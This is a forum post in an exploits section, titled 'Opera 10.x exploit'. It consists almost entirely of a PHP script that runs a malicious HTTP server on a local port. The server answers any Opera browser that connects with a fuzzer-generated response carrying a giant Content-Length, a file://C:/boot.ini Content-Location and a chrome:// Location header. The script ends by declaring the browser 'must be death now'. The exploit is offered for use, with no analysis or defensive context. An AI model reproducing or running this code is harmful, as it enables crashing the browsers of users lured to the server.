Jump to content
ICEBREAKER101010

Opera 10.x exploit

By ICEBREAKER101010, in Exploituri

Recommended Posts

ICEBREAKER101010 Contributor

ICEBREAKER101010

Posted
Posted

<?php

if(strtolower(substr($_ENV['OS'],0,3)) == "win") define('OS','win');

else define('OS','nix');

if(!extension_loaded('php_sockets'))

{

if((OS == 'win') && (!@dl('php_sockets.dll')) ||

((OS == 'nix') && (!@dl('php_sockets.so'))))

die('fatal php_sockets.[dll/so] '.

'not loaded '."\r\n"); //.__line__.' '.__file__."\r\n");

}

/*Generated by my own fuzzer*/

$EVIL = 'HTTP/1.1 200 ok'."\r\n".

'Transfer-Encoding: identity'."\r\n".

'Date: thu 28 dec 2003 12:4:33 gmt'."\r\n".

'Server: moj zuy server'."\r\n".

'Set-Cookie: psid=d6dd02e9957fb162d2385ca6f2829a73;path=C:/'."\r\n".

'Content-Location: file://C:/boot.ini'."\r\n".

'Vary:negotiate,accept-language,accept-charset'."\r\n".

'Tcn: choice'."\r\n".

'Last-modified: sun,21 nov 2010 22:22:22 gmt'."\r\n".

'Etag: "3861-5c6-1b28fa80;386a-9dc-1b28fa80"'."\r\n".

'Accept-Ranges: bytes'."\r\n".

'Cache-Control: max-age=0'."\r\n".

'Expires: mon, 22 feb 2010 18:31:20 gmt'."\r\n".

'Content-Encoding: identity'."\r\n".

'Content-Length:9999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999666 '."\r\n".

'Via: 1.1 cache.zuo.pl:3128 (squid/2.7.stable6)'."\r\n".

'Keep-Alive: timeout=15, max=300'."\r\n".

'Connection: keep-alive'."\r\n".

'Content-Type: text/html; charset=iso-8859-2'."\r\n".

'Age: 1'."\r\n".

'Allow: GET,HEAD'."\r\n".

'Content-Disposition: inline'."\r\n".

'Content-MD5: Q2hlY2sgSW50ZWdyaXR5IQ=='."\r\n".

'Warning: 199 Miscellaneous warning'."\r\n".

'Trailer: Max-Forwards'."\r\n".

'Location: chrome://inspector/content/viewers/dom/dom.xul'."\r\n".

'Content-Range: bytes 21010-47021/47022'."\r\n".

'Content-Language: pl'."\r\n\r\n".

'<html><head></head><body style="background-color:red;color:white;text-align:center;"><b>seq_end</b><script>location.href="http://swswqosksqowkd";</script></body></html>';

$buster = $argc - 1;

//use -port 666 if you need

for($i = 0; $i<=$buster; $i+=2)

{

if(('-port' == $argv[$i]) && ((int)$argv[$i + 1] > 0)) $PORT = $argv[$i + 1];

else $PORT = 81;

}

if(!($SOCKET = socket_create_listen($PORT)))

die('fatal socket init failed'."\r\n");

socket_set_option($SOCKET,SOL_SOCKET,

SO_RCVTIMEO,array("sec"=>3,"usec"=>0));

echo('SOCKET READY AT PORT '.$PORT."\r\n".

'Now connect here via opera'."\r\n");

if($CONNECT = socket_accept($SOCKET))

{

$recv_buffer = null;

echo('Connection ok '."\r\n");

if(socket_recv($CONNECT,$recv_buffer,8,/*msg_dontwait*/MSG_WAITALL))

{

if(!@socket_write($CONNECT,$EVIL))

{

socket_close($CONNECT);

socket_close($SOCKET);

die('I cant send payload !'."\r\n");

}

}

else echo('Something wrong with client side'."\r\n");

usleep(120000);

socket_close($CONNECT);

socket_close($SOCKET);

}

echo('OK ya browser must be death now'."\r\n".

'Have a nice day lol'."\r\n");

?>

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...